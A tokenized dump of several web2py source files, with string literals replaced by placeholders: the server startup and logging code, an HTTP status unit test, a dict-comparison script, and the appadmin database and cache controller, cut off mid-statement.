_unlock ( response ) <EOL> http_response , new_environ = try_rewrite_on_error ( <EOL> http_response , request , environ , ticket ) <EOL> if not http_response : <EOL> return wsgibase ( new_environ , responder ) <EOL> if global_settings . web2py_crontype == '<STR_LIT>' : <EOL> newcron . softcron ( global_settings . applications_parent ) . start ( ) <EOL> return http_response . to ( responder , env = env ) <EOL> def save_password ( password , port ) : <EOL> """<STR_LIT>""" <EOL> password_file = abspath ( '<STR_LIT>' % port ) <EOL> if password == '<STR_LIT>' : <EOL> chars = string . letters + string . digits <EOL> password = '<STR_LIT>' . join ( [ random . choice ( chars ) for i in range ( <NUM_LIT:8> ) ] ) <EOL> cpassword = CRYPT ( ) ( password ) [ <NUM_LIT:0> ] <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' % password <EOL> print '<STR_LIT>' <EOL> elif password == '<STR_LIT>' : <EOL> if exists ( password_file ) : <EOL> return <EOL> else : <EOL> password = '<STR_LIT>' <EOL> elif password . startswith ( '<STR_LIT>' ) : <EOL> cpassword = password [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> else : <EOL> cpassword = CRYPT ( ) ( password ) [ <NUM_LIT:0> ] <EOL> fp = open ( password_file , '<STR_LIT:w>' ) <EOL> if password : <EOL> fp . write ( '<STR_LIT>' % cpassword ) <EOL> else : <EOL> fp . write ( '<STR_LIT>' ) <EOL> fp . close ( ) <EOL> def appfactory ( wsgiapp = wsgibase , <EOL> logfilename = '<STR_LIT>' , <EOL> profiler_dir = None , <EOL> profilerfilename = None ) : <EOL> """<STR_LIT>""" <EOL> if profilerfilename is not None : <EOL> raise BaseException ( "<STR_LIT>" ) <EOL> if profiler_dir : <EOL> profiler_dir = abspath ( profiler_dir ) <EOL> logger . warn ( '<STR_LIT>' , profiler_dir ) <EOL> if not os . path . isdir ( profiler_dir ) : <EOL> try : <EOL> os . makedirs ( profiler_dir ) <EOL> except : <EOL> raise BaseException ( "<STR_LIT>" % profiler_dir ) <EOL> filepath = pjoin ( profiler_dir , '<STR_LIT>' ) <EOL> try : <EOL> filehandle = open ( filepath , '<STR_LIT:w>' ) <EOL> filehandle . close ( ) <EOL> os . unlink ( filepath ) <EOL> except IOError : <EOL> raise BaseException ( "<STR_LIT>" % profiler_dir ) <EOL> def app_with_logging ( environ , responder ) : <EOL> """<STR_LIT>""" <EOL> status_headers = [ ] <EOL> def responder2 ( s , h ) : <EOL> """<STR_LIT>""" <EOL> status_headers . append ( s ) <EOL> status_headers . append ( h ) <EOL> return responder ( s , h ) <EOL> time_in = time . time ( ) <EOL> ret = [ <NUM_LIT:0> ] <EOL> if not profiler_dir : <EOL> ret [ <NUM_LIT:0> ] = wsgiapp ( environ , responder2 ) <EOL> else : <EOL> import cProfile <EOL> prof = cProfile . Profile ( ) <EOL> prof . enable ( ) <EOL> ret [ <NUM_LIT:0> ] = wsgiapp ( environ , responder2 ) <EOL> prof . disable ( ) <EOL> destfile = pjoin ( profiler_dir , "<STR_LIT>" % web2py_uuid ( ) ) <EOL> prof . dump_stats ( destfile ) <EOL> try : <EOL> line = '<STR_LIT>' % ( <EOL> environ [ '<STR_LIT>' ] , <EOL> datetime . datetime . today ( ) . strftime ( '<STR_LIT>' ) , <EOL> environ [ '<STR_LIT>' ] , <EOL> environ [ '<STR_LIT>' ] . replace ( '<STR_LIT:U+002C>' , '<STR_LIT>' ) , <EOL> environ [ '<STR_LIT>' ] , <EOL> ( status_headers [ <NUM_LIT:0> ] ) [ : <NUM_LIT:3> ] , <EOL> time . time ( ) - time_in , <EOL> ) <EOL> if not logfilename : <EOL> sys . stdout . write ( line ) <EOL> elif isinstance ( logfilename , str ) : <EOL> write_file ( logfilename , line , '<STR_LIT:a>' ) <EOL> else : <EOL> logfilename . write ( line ) <EOL> except : <EOL> pass <EOL> return ret [ <NUM_LIT:0> ] <EOL> return app_with_logging <EOL> class HttpServer ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( <EOL> self , <EOL> ip = '<STR_LIT:127.0.0.1>' , <EOL> port = <NUM_LIT> , <EOL> password = '<STR_LIT>' , <EOL> pid_filename = '<STR_LIT>' , <EOL> log_filename = '<STR_LIT>' , <EOL> profiler_dir = None , <EOL> ssl_certificate = None , <EOL> ssl_private_key = None , <EOL> ssl_ca_certificate = None , <EOL> min_threads = None , <EOL> max_threads = None , <EOL> server_name = None , <EOL> request_queue_size = <NUM_LIT:5> , <EOL> timeout = <NUM_LIT:10> , <EOL> socket_timeout = <NUM_LIT:1> , <EOL> shutdown_timeout = None , <EOL> path = None , <EOL> interfaces = None <EOL> ) : <EOL> """<STR_LIT>""" <EOL> if interfaces : <EOL> import types <EOL> if isinstance ( interfaces , types . ListType ) : <EOL> for i in interfaces : <EOL> if not isinstance ( i , types . TupleType ) : <EOL> raise "<STR_LIT>" <EOL> else : <EOL> raise "<STR_LIT>" <EOL> if path : <EOL> global web2py_path <EOL> path = os . path . normpath ( path ) <EOL> web2py_path = path <EOL> global_settings . applications_parent = path <EOL> os . chdir ( path ) <EOL> [ add_path_first ( p ) for p in ( path , abspath ( '<STR_LIT>' ) , "<STR_LIT>" ) ] <EOL> if exists ( "<STR_LIT>" ) : <EOL> logging . config . fileConfig ( "<STR_LIT>" ) <EOL> save_password ( password , port ) <EOL> self . pid_filename = pid_filename <EOL> if not server_name : <EOL> server_name = socket . gethostname ( ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> rocket . SERVER_NAME = server_name <EOL> rocket . SOCKET_TIMEOUT = socket_timeout <EOL> sock_list = [ ip , port ] <EOL> if not ssl_certificate or not ssl_private_key : <EOL> logger . info ( '<STR_LIT>' ) <EOL> elif not rocket . ssl : <EOL> logger . warning ( '<STR_LIT>' ) <EOL> elif not exists ( ssl_certificate ) : <EOL> logger . warning ( '<STR_LIT>' ) <EOL> elif not exists ( ssl_private_key ) : <EOL> logger . warning ( '<STR_LIT>' ) <EOL> else : <EOL> sock_list . extend ( [ ssl_private_key , ssl_certificate ] ) <EOL> if ssl_ca_certificate : <EOL> sock_list . append ( ssl_ca_certificate ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> app_info = { '<STR_LIT>' : appfactory ( wsgibase , <EOL> log_filename , <EOL> profiler_dir ) } <EOL> self . server = rocket . Rocket ( interfaces or tuple ( sock_list ) , <EOL> method = '<STR_LIT>' , <EOL> app_info = app_info , <EOL> min_threads = min_threads , <EOL> max_threads = max_threads , <EOL> queue_size = int ( request_queue_size ) , <EOL> timeout = int ( timeout ) , <EOL> handle_signals = False , <EOL> ) <EOL> def start ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> signal . signal ( signal . SIGTERM , lambda a , b , s = self : s . stop ( ) ) <EOL> signal . signal ( signal . SIGINT , lambda a , b , s = self : s . stop ( ) ) <EOL> except : <EOL> pass <EOL> write_file ( self . pid_filename , str ( os . getpid ( ) ) ) <EOL> self . server . start ( ) <EOL> def stop ( self , stoplogging = False ) : <EOL> """<STR_LIT>""" <EOL> newcron . stopcron ( ) <EOL> self . server . stop ( stoplogging ) <EOL> try : <EOL> os . unlink ( self . pid_filename ) <EOL> except : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import os <EOL> import unittest <EOL> def fix_sys_path ( ) : <EOL> """<STR_LIT>""" <EOL> def add_path_first ( path ) : <EOL> sys . path = [ path ] + [ p for p in sys . path if ( <EOL> not p == path and not p == ( path + '<STR_LIT:/>' ) ) ] <EOL> path = os . path . dirname ( os . path . abspath ( __file__ ) ) <EOL> if not os . path . isfile ( os . path . join ( path , '<STR_LIT>' ) ) : <EOL> i = <NUM_LIT:0> <EOL> while i < <NUM_LIT:10> : <EOL> i += <NUM_LIT:1> <EOL> if os . path . exists ( os . path . join ( path , '<STR_LIT>' ) ) : <EOL> break <EOL> path = os . path . abspath ( os . path . join ( path , '<STR_LIT:..>' ) ) <EOL> paths = [ path , <EOL> os . path . abspath ( os . path . join ( path , '<STR_LIT>' ) ) , <EOL> os . path . abspath ( os . path . join ( path , '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' ] <EOL> [ add_path_first ( path ) for path in paths ] <EOL> fix_sys_path ( ) <EOL> from http import HTTP , defined_status <EOL> class TestHTTP ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_status_message ( self ) : <EOL> """<STR_LIT>""" <EOL> h = HTTP <EOL> def gen_status_str ( code , message ) : <EOL> return str ( code ) + '<STR_LIT:U+0020>' + str ( message ) <EOL> message = '<STR_LIT>' <EOL> code = <NUM_LIT> <EOL> self . assertEqual ( str ( h ( gen_status_str ( code , message ) ) ) , <EOL> gen_status_str ( code , message ) ) <EOL> for code in defined_status . keys ( ) : <EOL> self . assertEqual ( <EOL> str ( h ( code ) ) , <EOL> gen_status_str ( code , defined_status [ code ] ) ) <EOL> for code in defined_status . keys ( ) : <EOL> self . assertEqual ( str ( h ( gen_status_str ( code , message ) ) ) , <EOL> gen_status_str ( code , message ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> '''<STR_LIT>''' <EOL> __docformat__ = "<STR_LIT>" <EOL> import getopt <EOL> import os . path <EOL> import sys <EOL> def main ( argv ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> opts , args = getopt . getopt ( argv , "<STR_LIT:h>" , [ "<STR_LIT>" ] ) <EOL> except getopt . GetoptError : <EOL> exit_with_parsing_error ( ) <EOL> for opt , arg in opts : <EOL> arg = arg <EOL> if opt in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> usage ( ) <EOL> sys . exit ( ) <EOL> if len ( args ) == <NUM_LIT:2> : <EOL> params = list ( get_dicts ( * args ) ) <EOL> params . extend ( get_dict_names ( * args ) ) <EOL> compare_dicts ( * params ) <EOL> else : <EOL> exit_with_parsing_error ( ) <EOL> def exit_with_parsing_error ( ) : <EOL> """<STR_LIT>""" <EOL> print ( "<STR_LIT>" ) <EOL> usage ( ) <EOL> sys . exit ( <NUM_LIT:2> ) <EOL> def usage ( ) : <EOL> """<STR_LIT>""" <EOL> print ( __doc__ ) <EOL> def get_dicts ( dict_path1 , dict_path2 ) : <EOL> """<STR_LIT>""" <EOL> return eval ( open ( dict_path1 ) . read ( ) ) , eval ( open ( dict_path2 ) . read ( ) ) <EOL> def get_dict_names ( dict1_path , dict2_path ) : <EOL> """<STR_LIT>""" <EOL> dict1_name = os . path . basename ( dict1_path ) <EOL> dict2_name = os . path . basename ( dict2_path ) <EOL> if dict1_name == dict2_name : <EOL> dict1_name = "<STR_LIT>" <EOL> dict2_name = "<STR_LIT>" <EOL> return dict1_name , dict2_name <EOL> def compare_dicts ( dict1 , dict2 , dict1_name , dict2_name ) : <EOL> """<STR_LIT>""" <EOL> dict1_keyset = set ( dict1 . keys ( ) ) <EOL> dict2_keyset = set ( dict2 . keys ( ) ) <EOL> print_key_diff ( dict1_keyset - dict2_keyset , dict1_name , dict2_name ) <EOL> print_key_diff ( dict2_keyset - dict1_keyset , dict2_name , dict1_name ) <EOL> print "<STR_LIT>" <EOL> has_value_differences = False <EOL> for key in dict1_keyset & dict2_keyset : <EOL> if dict1 [ key ] != dict2 [ key ] : <EOL> print "<STR_LIT>" % ( key , ) <EOL> print "<STR_LIT>" % ( dict1_name , dict1 [ key ] , ) <EOL> print "<STR_LIT>" % ( dict2_name , dict2 [ key ] , ) <EOL> print <EOL> has_value_differences = True <EOL> if not has_value_differences : <EOL> print "<STR_LIT>" <EOL> def print_key_diff ( key_diff , dict1_name , dict2_name ) : <EOL> """<STR_LIT>""" <EOL> print "<STR_LIT>" % ( dict1_name , dict2_name ) <EOL> if len ( key_diff ) : <EOL> for key in key_diff : <EOL> print "<STR_LIT>" % ( key , ) <EOL> else : <EOL> print "<STR_LIT>" <EOL> print <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( sys . argv [ <NUM_LIT:1> : ] ) </s>
<s> import os <EOL> import socket <EOL> import datetime <EOL> import copy <EOL> import gluon . contenttype <EOL> import gluon . fileutils <EOL> try : <EOL> import pygraphviz as pgv <EOL> except ImportError : <EOL> pgv = None <EOL> global_env = copy . copy ( globals ( ) ) <EOL> global_env [ '<STR_LIT>' ] = datetime <EOL> http_host = request . env . http_host . split ( '<STR_LIT::>' ) [ <NUM_LIT:0> ] <EOL> remote_addr = request . env . remote_addr <EOL> try : <EOL> hosts = ( http_host , socket . gethostname ( ) , <EOL> socket . gethostbyname ( http_host ) , <EOL> '<STR_LIT>' , '<STR_LIT:127.0.0.1>' , '<STR_LIT>' ) <EOL> except : <EOL> hosts = ( http_host , ) <EOL> if request . env . http_x_forwarded_for or request . is_https : <EOL> session . secure ( ) <EOL> elif ( remote_addr not in hosts ) and ( remote_addr != "<STR_LIT:127.0.0.1>" ) and ( request . function != '<STR_LIT>' ) : <EOL> raise HTTP ( <NUM_LIT:200> , T ( '<STR_LIT>' ) ) <EOL> if request . function == '<STR_LIT>' : <EOL> if not '<STR_LIT>' in globals ( ) or not request . args : <EOL> redirect ( URL ( request . controller , '<STR_LIT:index>' ) ) <EOL> manager_action = auth . settings . manager_actions . get ( request . args ( <NUM_LIT:0> ) , None ) <EOL> if manager_action is None and request . args ( <NUM_LIT:0> ) == '<STR_LIT>' : <EOL> manager_action = dict ( role = auth . settings . auth_manager_role , <EOL> heading = T ( '<STR_LIT>' ) , <EOL> tables = [ auth . table_user ( ) , <EOL> auth . table_group ( ) , <EOL> auth . table_permission ( ) ] ) <EOL> manager_role = manager_action . get ( '<STR_LIT>' , None ) if manager_action else None <EOL> auth . requires_membership ( manager_role ) ( lambda : None ) ( ) <EOL> menu = False <EOL> elif ( request . application == '<STR_LIT>' and not session . authorized ) or ( request . application != '<STR_LIT>' and not gluon . fileutils . check_credentials ( request ) ) : <EOL> redirect ( URL ( '<STR_LIT>' , '<STR_LIT:default>' , '<STR_LIT:index>' , <EOL> vars = dict ( send = URL ( args = request . args , vars = request . vars ) ) ) ) <EOL> else : <EOL> response . subtitle = T ( '<STR_LIT>' ) <EOL> menu = True <EOL> ignore_rw = True <EOL> response . view = '<STR_LIT>' <EOL> if menu : <EOL> response . menu = [ [ T ( '<STR_LIT>' ) , False , URL ( '<STR_LIT>' , '<STR_LIT:default>' , '<STR_LIT>' , <EOL> args = [ request . application ] ) ] , [ T ( '<STR_LIT>' ) , False , <EOL> URL ( '<STR_LIT:index>' ) ] , [ T ( '<STR_LIT:state>' ) , False , <EOL> URL ( '<STR_LIT:state>' ) ] , [ T ( '<STR_LIT>' ) , False , <EOL> URL ( '<STR_LIT>' ) ] ] <EOL> if False and request . tickets_db : <EOL> from gluon . restricted import TicketStorage <EOL> ts = TicketStorage ( ) <EOL> ts . _get_table ( request . tickets_db , ts . tablename , request . application ) <EOL> def get_databases ( request ) : <EOL> dbs = { } <EOL> for ( key , value ) in global_env . items ( ) : <EOL> cond = False <EOL> try : <EOL> cond = isinstance ( value , GQLDB ) <EOL> except : <EOL> cond = isinstance ( value , SQLDB ) <EOL> if cond : <EOL> dbs [ key ] = value <EOL> return dbs <EOL> databases = get_databases ( None ) <EOL> def eval_in_global_env ( text ) : <EOL> exec ( '<STR_LIT>' % text , { } , global_env ) <EOL> return global_env [ '<STR_LIT>' ] <EOL> def get_database ( request ) : <EOL> if request . args and request . args [ <NUM_LIT:0> ] in databases : <EOL> return eval_in_global_env ( request . args [ <NUM_LIT:0> ] ) <EOL> else : <EOL> session . flash = T ( '<STR_LIT>' ) <EOL> redirect ( URL ( '<STR_LIT:index>' ) ) <EOL> def get_table ( request ) : <EOL> db = get_database ( request ) <EOL> if len ( request . args ) > <NUM_LIT:1> and request . args [ <NUM_LIT:1> ] in db . tables : <EOL> return ( db , request . args [ <NUM_LIT:1> ] ) <EOL> else : <EOL> session . flash = T ( '<STR_LIT>' ) <EOL> redirect ( URL ( '<STR_LIT:index>' ) ) <EOL> def get_query ( request ) : <EOL> try : <EOL> return eval_in_global_env ( request . vars . query ) <EOL> except Exception : <EOL> return None <EOL> def query_by_table_type ( tablename , db , request = request ) : <EOL> keyed = hasattr ( db [ tablename ] , '<STR_LIT>' ) <EOL> if keyed : <EOL> firstkey = db [ tablename ] [ db [ tablename ] . _primarykey [ <NUM_LIT:0> ] ] <EOL> cond = '<STR_LIT>' <EOL> if firstkey . type in [ '<STR_LIT:string>' , '<STR_LIT:text>' ] : <EOL> cond = '<STR_LIT>' <EOL> qry = '<STR_LIT>' % ( <EOL> request . args [ <NUM_LIT:0> ] , request . args [ <NUM_LIT:1> ] , firstkey . name , cond ) <EOL> else : <EOL> qry = '<STR_LIT>' % tuple ( request . args [ : <NUM_LIT:2> ] ) <EOL> return qry <EOL> def index ( ) : <EOL> return dict ( databases = databases ) <EOL> def insert ( ) : <EOL> ( db , table ) = get_table ( request ) <EOL> form = SQLFORM ( db [ table ] , ignore_rw = ignore_rw ) <EOL> if form . accepts ( request . vars , session ) : <EOL> response . flash = T ( '<STR_LIT>' ) <EOL> return dict ( form = form , table = db [ table ] ) <EOL> def download ( ) : <EOL> import os <EOL> db = get_database ( request ) <EOL> return response . download ( request , db ) <EOL> def csv ( ) : <EOL> import gluon . contenttype <EOL> response . headers [ '<STR_LIT:Content-Type>' ] = gluon . contenttype . contenttype ( '<STR_LIT>' ) <EOL> db = get_database ( request ) <EOL> query = get_query ( request ) <EOL> if not query : <EOL> return None <EOL> response . headers [ '<STR_LIT>' ] = '<STR_LIT>' % tuple ( request . vars . query . split ( '<STR_LIT:.>' ) [ : <NUM_LIT:2> ] ) <EOL> return str ( db ( query , ignore_common_filters = True ) . select ( ) ) <EOL> def import_csv ( table , file ) : <EOL> table . import_from_csv_file ( file ) <EOL> def select ( ) : <EOL> import re <EOL> db = get_database ( request ) <EOL> dbname = request . args [ <NUM_LIT:0> ] <EOL> try : <EOL> is_imap = db . _uri . startswith ( "<STR_LIT>" ) <EOL> except ( KeyError , AttributeError , TypeError ) : <EOL> is_imap = False <EOL> regex = re . compile ( '<STR_LIT>' ) <EOL> if len ( request . args ) > <NUM_LIT:1> and hasattr ( db [ request . args [ <NUM_LIT:1> ] ] , '<STR_LIT>' ) : <EOL> regex = re . compile ( '<STR_LIT>' ) <EOL> if request . vars . query : <EOL> match = regex . match ( request . vars . query ) <EOL> if match : <EOL> request . vars . query = '<STR_LIT>' % ( request . args [ <NUM_LIT:0> ] , <EOL> match . group ( '<STR_LIT>' ) , match . group ( '<STR_LIT>' ) , <EOL> match . group ( '<STR_LIT:value>' ) ) <EOL> else : <EOL> request . vars . query = session . last_query <EOL> query = get_query ( request ) <EOL> if request . vars . start : <EOL> start = int ( request . vars . start ) <EOL> else : <EOL> start = <NUM_LIT:0> <EOL> nrows = <NUM_LIT:0> <EOL> step = <NUM_LIT:100> <EOL> fields = [ ] <EOL> if is_imap : <EOL> step = <NUM_LIT:3> <EOL> stop = start + step <EOL> table = None <EOL> rows = [ ] <EOL> orderby = request . vars . orderby <EOL> if orderby : <EOL> orderby = dbname + '<STR_LIT:.>' + orderby <EOL> if orderby == session . last_orderby : <EOL> if orderby [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> orderby = orderby [ <NUM_LIT:1> : ] <EOL> else : <EOL> orderby = '<STR_LIT>' + orderby <EOL> session . last_orderby = orderby <EOL> session . last_query = request . vars . query <EOL> form = FORM ( TABLE ( TR ( T ( '<STR_LIT>' ) , '<STR_LIT>' , INPUT ( _style = '<STR_LIT>' , <EOL> _name = '<STR_LIT>' , _value = request . vars . query or '<STR_LIT>' , <EOL> requires = IS_NOT_EMPTY ( <EOL> error_message = T ( "<STR_LIT>" ) ) ) ) , TR ( T ( '<STR_LIT>' ) , <EOL> INPUT ( _name = '<STR_LIT>' , _type = '<STR_LIT>' , <EOL> value = False ) , INPUT ( _style = '<STR_LIT>' , <EOL> _name = '<STR_LIT>' , _value = request . vars . update_fields <EOL> or '<STR_LIT>' ) ) , TR ( T ( '<STR_LIT>' ) , INPUT ( _name = '<STR_LIT>' , <EOL> _class = '<STR_LIT>' , _type = '<STR_LIT>' , value = False ) , '<STR_LIT>' ) , <EOL> TR ( '<STR_LIT>' , '<STR_LIT>' , INPUT ( _type = '<STR_LIT>' , _value = T ( '<STR_LIT>' ) ) ) ) , <EOL> _action = URL ( r = request , args = request . args ) ) <EOL> tb = None <EOL> if form . accepts ( request . vars , formname = None ) : <EOL> regex = re . compile ( request . args [ <NUM_LIT:0> ] + '<STR_LIT>' ) <EOL> match = regex . match ( form . vars . query . strip ( ) ) <EOL> if match : <EOL> table = match . group ( '<STR_LIT>' ) <EOL> try : <EOL> nrows = db ( query , ignore_common_filters = True ) . count ( ) <EOL> if form . vars . update_check and form . vars . update_fields : <EOL> db ( query , ignore_common_filters = True ) . update ( <EOL> ** eval_in_global_env ( '<STR_LIT>' % form . vars . update_fields ) ) <EOL> response . flash = T ( '<STR_LIT>' , nrows ) <EOL> elif form . vars . delete_check : <EOL> db ( query , ignore_common_filters = True ) . delete ( ) <EOL> response . flash = T ( '<STR_LIT>' , nrows ) <EOL> nrows = db ( query , ignore_common_filters = True ) . count ( ) <EOL> if is_imap : <EOL> fields = [ db [ table ] [ name ] for name in <EOL> ( "<STR_LIT:id>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:to>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ) ] <EOL> if orderby : <EOL> rows = db ( query , ignore_common_filters = True ) . select ( <EOL> * fields , limitby = ( start , stop ) , <EOL> orderby = eval_in_global_env ( orderby ) ) <EOL> else : <EOL> rows = db ( query , ignore_common_filters = True ) . select ( <EOL> * fields , limitby = ( start , stop ) ) <EOL> except Exception , e : <EOL> import traceback <EOL> tb = traceback . format_exc ( ) <EOL> ( rows , nrows ) = ( [ ] , <NUM_LIT:0> ) <EOL> response . flash = DIV ( T ( '<STR_LIT>' ) , PRE ( str ( e ) ) ) <EOL> csv_table = table or request . vars . table <EOL> if csv_table : <EOL> formcsv = FORM ( str ( T ( '<STR_LIT>' ) ) + "<STR_LIT:U+0020>" , <EOL> INPUT ( _type = '<STR_LIT:file>' , _name = '<STR_LIT>' ) , <EOL> INPUT ( _type = '<STR_LIT>' , _value = csv_table , _name = '<STR_LIT>' ) , <EOL> INPUT ( _type = '<STR_LIT>' , _value = T ( '<STR_LIT>' ) ) ) <EOL> else : <EOL> formcsv = None <EOL> if formcsv and formcsv . process ( ) . accepted : <EOL> try : <EOL> import_csv ( db [ request . vars . table ] , <EOL> request . vars . csvfile . file ) <EOL> response . flash = T ( '<STR_LIT>' ) <EOL> except Exception , e : <EOL> response . flash = DIV ( T ( '<STR_LIT>' ) , PRE ( str ( e ) ) ) <EOL> return dict ( <EOL> form = form , <EOL> table = table , <EOL> start = start , <EOL> stop = stop , <EOL> step = step , <EOL> nrows = nrows , <EOL> rows = rows , <EOL> query = request . vars . query , <EOL> formcsv = formcsv , <EOL> tb = tb <EOL> ) <EOL> def update ( ) : <EOL> ( db , table ) = get_table ( request ) <EOL> keyed = hasattr ( db [ table ] , '<STR_LIT>' ) <EOL> record = None <EOL> db [ table ] . _common_filter = None <EOL> if keyed : <EOL> key = [ f for f in request . vars if f in db [ table ] . _primarykey ] <EOL> if key : <EOL> record = db ( db [ table ] [ key [ <NUM_LIT:0> ] ] == request . vars [ key [ <EOL> <NUM_LIT:0> ] ] ) . select ( ) . first ( ) <EOL> else : <EOL> record = db ( db [ table ] . id == request . args ( <EOL> <NUM_LIT:2> ) ) . select ( ) . first ( ) <EOL> if not record : <EOL> qry = query_by_table_type ( table , db ) <EOL> session . flash = T ( '<STR_LIT>' ) <EOL> redirect ( URL ( '<STR_LIT>' , args = request . args [ : <NUM_LIT:1> ] , <EOL> vars = dict ( query = qry ) ) ) <EOL> if keyed : <EOL> for k in db [ table ] . _primarykey : <EOL> db [ table ] [ k ] . writable = False <EOL> form = SQLFORM ( <EOL> db [ table ] , record , deletable = True , delete_label = T ( '<STR_LIT>' ) , <EOL> ignore_rw = ignore_rw and not keyed , <EOL> linkto = URL ( '<STR_LIT>' , <EOL> args = request . args [ : <NUM_LIT:1> ] ) , upload = URL ( r = request , <EOL> f = '<STR_LIT>' , args = request . args [ : <NUM_LIT:1> ] ) ) <EOL> if form . accepts ( request . vars , session ) : <EOL> session . flash = T ( '<STR_LIT>' ) <EOL> qry = query_by_table_type ( table , db ) <EOL> redirect ( URL ( '<STR_LIT>' , args = request . args [ : <NUM_LIT:1> ] , <EOL> vars = dict ( query = qry ) ) ) <EOL> return dict ( form = form , table = db [ table ] ) <EOL> def state ( ) : <EOL> return dict ( ) <EOL> def ccache ( ) : <EOL> cache . ram . initialize ( ) <EOL> cache . disk . initialize ( ) <EOL> form = FORM ( <EOL> P ( TAG . BUTTON ( <EOL> T ( "<STR_LIT>" ) , _type = "<STR_LIT>" , _name = "<STR_LIT:yes>" , _value = "<STR_LIT:yes>" ) ) , <EOL> P ( TAG . BUTTON ( <EOL> T ( "<STR_LIT>" ) , _type = "<STR_LIT>" , _name = "<STR_LIT>" , _value = "<STR_LIT>" ) ) , <EOL> P ( TAG . BUTTON ( <EOL> T ( "<STR_LIT>" ) , _type = "<STR_LIT>" , _name = "<STR_LIT>" , _value = "<STR_LIT>" ) ) , <EOL> ) <EOL> if form . accepts ( request . vars , session ) : <EOL> clear_ram = False <EOL> clear_disk = False <EOL> session . flash = "<STR_LIT>" <EOL> if request . vars . yes : <EOL> clear_ram = clear_disk = True <EOL> if request . vars . ram : <EOL> clear_ram = True <EOL> if request . vars . disk : <EOL> clear_disk = True <EOL> if clear_ram : <EOL> cache . ram . clear ( ) <EOL> session . flash += T ( "<STR_LIT>" ) <EOL> if clear_disk : <EOL> cache . disk . clear ( ) <EOL> session . flash += T ( "<STR_LIT>" ) <EOL> redirect ( URL ( r = request ) ) <EOL> try : <EOL> from guppy import hpy <EOL> hp = hpy ( ) <EOL> except ImportError : <EOL> hp = False <EOL> import shelve <EOL> import os <EOL> import copy <EOL> import time <EOL> import math <EOL> from gluon import portalocker <EOL> ram = { <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : time . time ( ) , <EOL> '<STR_LIT>' : [ ] <EOL> } <EOL> disk = copy . copy ( ram ) <EOL> total = copy . copy ( ram ) <EOL> disk [ '<STR_LIT>' ] = [ ] <EOL> total [ '<STR_LIT>' ] = [ ] <EOL> def GetInHMS ( seconds ) : <EOL> hours = math . floor ( seconds / <NUM_LIT> ) <EOL> seconds -= hours * <NUM_LIT> <EOL> minutes = math . floor ( seconds / <NUM_LIT> ) <EOL> seconds -= minutes * <NUM_LIT> <EOL> seconds = math . floor ( seconds ) <EOL> return ( hours , minutes , seconds ) <EOL> for key , value in cache . ram . storage . iteritems ( ) : <EOL> if isinstance ( value , dict ) : <EOL> ram [ '<STR_LIT>' ] = value [ '<STR_LIT>' ] - value [ '<STR_LIT>' ] <EOL> ram [ '<STR_LIT>' ] = value [ '<STR_LIT>' ] <EOL> try : <EOL> ram [ '<STR_LIT>' ] = ram [ '<STR_LIT>' ] * <NUM_LIT:100> / value [ '<STR_LIT>' ] <EOL> except ( KeyError , ZeroDivisionError ) : <EOL> ram [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> else : <EOL> if hp : <EOL> ram [ '<STR_LIT>' ] += hp . iso ( value [ <NUM_LIT:1> ] ) . size <EOL> ram [ '<STR_LIT>' ] += hp . iso ( value [ <NUM_LIT:1> ] ) . count <EOL> ram [ '<STR_LIT>' ] += <NUM_LIT:1> <EOL> if value [ <NUM_LIT:0> ] < ram [ '<STR_LIT>' ] : <EOL> ram [ '<STR_LIT>' ] = value [ <NUM_LIT:0> ] <EOL> ram [ '<STR_LIT>' ] . append ( ( key , GetInHMS ( time . time ( ) - value [ <NUM_LIT:0> ] ) ) ) <EOL> folder = os . path . join ( request . folder , '<STR_LIT>' ) <EOL> if not os . path . exists ( folder ) : <EOL> os . mkdir ( folder ) <EOL> locker = open ( os . path . join ( folder , '<STR_LIT>' ) , '<STR_LIT:a>' ) <EOL> portalocker . lock ( locker , portalocker . LOCK_EX ) <EOL> disk_storage = shelve . open ( <EOL> os . path . join ( folder , '<STR_LIT>' ) ) <EOL> try : <EOL> for key , value in disk_storage . items ( ) : <EOL> if isinstance ( value , dict ) : <EOL> disk [ '<STR_LIT>' ] = value [ '<STR_LIT>' ] - value [ '<STR_LIT>' ] <EOL> disk [ '<STR_LIT>' ] = value [ '<STR_LIT>' ] <EOL> try : <EOL> disk [ '<STR_LIT>' ] = disk [ '<STR_LIT>' ] * <NUM_LIT:100> / value [ '<STR_LIT>' ] <EOL> except ( KeyError , ZeroDivisionError ) : <EOL> disk [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> else : <EOL> if hp : <EOL> disk [ '<STR_LIT>' ] += hp . iso ( value [ <NUM_LIT:1> ] ) . size <EOL> disk [ '<STR_LIT>' ] += hp . iso ( value [ <NUM_LIT:1> ] ) . count <EOL> disk [ '<STR_LIT>' ] += <NUM_LIT:1> <EOL> if value [ <NUM_LIT:0> ] < disk [ '<STR_LIT>' ] : <EOL> disk [ '<STR_LIT>' ] = value [ <NUM_LIT:0> ] <EOL> disk [ '<STR_LIT>' ] . append ( ( key , GetInHMS ( time . time ( ) - value [ <NUM_LIT:0> ] ) ) ) <EOL> finally : <EOL> portalocker . unlock ( locker ) <EOL> locker . close ( ) <EOL> disk_storage . close ( ) <EOL> total [ '<STR_LIT>' ] = ram [ '<STR_LIT>' ] + disk [ '<STR_LIT>' ] <EOL> total 